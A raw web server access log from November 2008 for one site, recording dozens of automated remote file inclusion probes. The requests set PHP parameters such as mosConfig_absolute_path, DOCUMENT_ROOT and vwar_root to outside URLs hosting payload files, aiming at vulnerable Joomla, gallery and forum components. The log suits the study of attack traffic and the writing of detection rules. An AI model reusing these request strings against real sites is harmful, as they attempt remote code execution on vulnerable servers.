75.127.70.39 - - [10/Nov/2008:09:28:01 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:28:01 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://sprula.kit.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.dmulk.com"
75.127.70.39 - - [10/Nov/2008:09:28:01 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://sprula.kit.net/id.txt???? HTTP/1.1" 200 95096 "-" "libwww-perl/5.819" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:28:23 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:28:24 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:28:28 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [10/Nov/2008:09:28:28 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:28:39 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.70.187 - - [10/Nov/2008:09:28:47 -0800] "GET /logs/index.php?option=com_jb2&PostID=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
72.29.70.187 - - [10/Nov/2008:09:28:47 -0800] "GET /index.php?option=com_jb2&PostID=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/css.txt?? HTTP/1.1" 200 95030 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:28:49 -0800] "GET /errors.php?error=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:28:52 -0800] "GET /logs/errors.php?error=http://www.geocities.com/rinaputria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.207.81.134 - - [10/Nov/2008:09:28:53 -0800] "GET /logs/access_080805.log///vwar/backup/errors.php?error=http://geocities.com/bolmut/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:28:54 -0800] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:28:55 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:29:04 -0800] "GET /logs/access_080918.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:29:05 -0800] "GET /logs/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 73021 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:29:05 -0800] "GET /?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 200 94809 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [10/Nov/2008:09:29:22 -0800] "GET /logs/access_080811.log%20%20/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:29:23 -0800] "GET /errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
124.81.96.76 - - [10/Nov/2008:09:29:26 -0800] "GET /logs/access_080828.log/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
124.81.96.76 - - [10/Nov/2008:09:29:26 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
220.232.237.122 - - [10/Nov/2008:09:29:29 -0800] "GET /logs///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.232.237.122 - - [10/Nov/2008:09:29:29 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:29:31 -0800] "GET /logs/access_081027.log/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:29:32 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:29:32 -0800] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.81.96.76 - - [10/Nov/2008:09:29:47 -0800] "GET /logs/access_080712.log/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
71.6.198.91 - - [10/Nov/2008:09:30:01 -0800] "GET /errors.php?error=http://www.eshansingh.com/administrator/components/com_zoom/errors.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:30:15 -0800] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:30:28 -0800] "GET /logs/access_080703.log/index.php?page=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:30:29 -0800] "GET /index.php?page=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 200 94625 "-" "libwww-perl/5.64" "www.dmulk.com"
91.192.241.74 - - [10/Nov/2008:09:30:29 -0800] "GET /logs/index.php?page=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:30:43 -0800] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:30:45 -0800] "GET /logs/access_080303.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:09:30:45 -0800] "GET /logs/access_071222.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:09:30:49 -0800] "GET /logs/access_080427.log/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:09:30:50 -0800] "GET /lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:09:30:50 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:30:58 -0800] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:31:04 -0800] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:31:04 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:31:14 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:31:14 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:31:14 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:09:31:16 -0800] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://www.spyoneradio.fr/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:31:17 -0800] "GET /logs/access_080901.log/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:31:21 -0800] "GET /logs/access_080330.log/?_zb_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:31:29 -0800] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.122 - - [10/Nov/2008:09:31:30 -0800] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [10/Nov/2008:09:31:37 -0800] "GET /logs/access_081005.log//include/admin.lib.inc.php?site_path=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.6.200 - - [10/Nov/2008:09:32:19 -0800] "GET /logs/access_080611.log//modules/threadstop/threadstop.php?new_exbb[home_path]=http://www.splendidpicnic.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:32:21 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:32:21 -0800] "GET /logs/access_081005.log//include/admin.lib.inc.php?site_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:32:21 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [10/Nov/2008:09:32:21 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.73.221 - - [10/Nov/2008:09:32:44 -0800] "GET /logs/access_080116.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.130.101.5 - - [10/Nov/2008:09:33:00 -0800] "GET /logs/access_080607.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.71.148 - - [10/Nov/2008:09:33:02 -0800] "GET //include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:09:33:04 -0800] "GET /logs/access_080621.log/lostpasswd.php?env[include_prefix]=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
200.37.73.221 - - [10/Nov/2008:09:33:06 -0800] "GET /logs/access_080516.log///include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://www.csj-ath.be/medias/media.prt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:33:13 -0800] "GET /logs/access_080809.log/errors.php?error=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:33:14 -0800] "GET /errors.php?error=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:33:14 -0800] "GET /logs/errors.php?error=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
115.68.1.34 - - [10/Nov/2008:09:33:15 -0800] "GET /logs/access_080315.log/errors.php?error=http://mabuak.zoomshare.com/files/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:33:19 -0800] "GET /logs/access.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:33:19 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:09:33:20 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:09:33:20 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:33:29 -0800] "GET /logs/access_080529.log//tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:33:29 -0800] "GET /tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:33:29 -0800] "GET /logs//tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:33:47 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:33:47 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:33:47 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.193.117.182 - - [10/Nov/2008:09:33:47 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:33:51 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:33:51 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:33:51 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:33:51 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:11 -0800] "GET /convert/mvcw.php?vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:11 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:11 -0800] "GET /logs/access_080901.log/convert/mvcw.php?vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:11 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:09:34:12 -0800] "GET /logs/access.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:09:34:12 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:14 -0800] "GET /logs/access_080901.log/convert/mvcw.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:14 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:14 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:14 -0800] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:17 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:17 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:18 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:23 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:09:34:25 -0800] "GET /logs/access.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:09:34:25 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:09:34:26 -0800] "GET /logs//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:30 -0800] "GET /logs/access_080901.log/convert/mvcw.php?vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:30 -0800] "GET /convert/mvcw.php?vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:30 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:42 -0800] "GET /logs/access_080901.log/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:43 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:43 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:34:45 -0800] "GET /logs/access_080918.log/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:46 -0800] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:34:55 -0800] "GET /logs/access_080918.log/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:34:55 -0800] "GET /logs/access_080811.log/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:09:34:58 -0800] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/rio_rizaldy//blini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.159.44.50 - - [10/Nov/2008:09:35:01 -0800] "GET /logs/access_080811.log/?mosConfig_absolute_path=http://www.vidinas.net/includes/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:35:02 -0800] "GET /logs/access_080529.log//tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [10/Nov/2008:09:35:03 -0800] "GET /tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.300radio.com/sondage/image/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
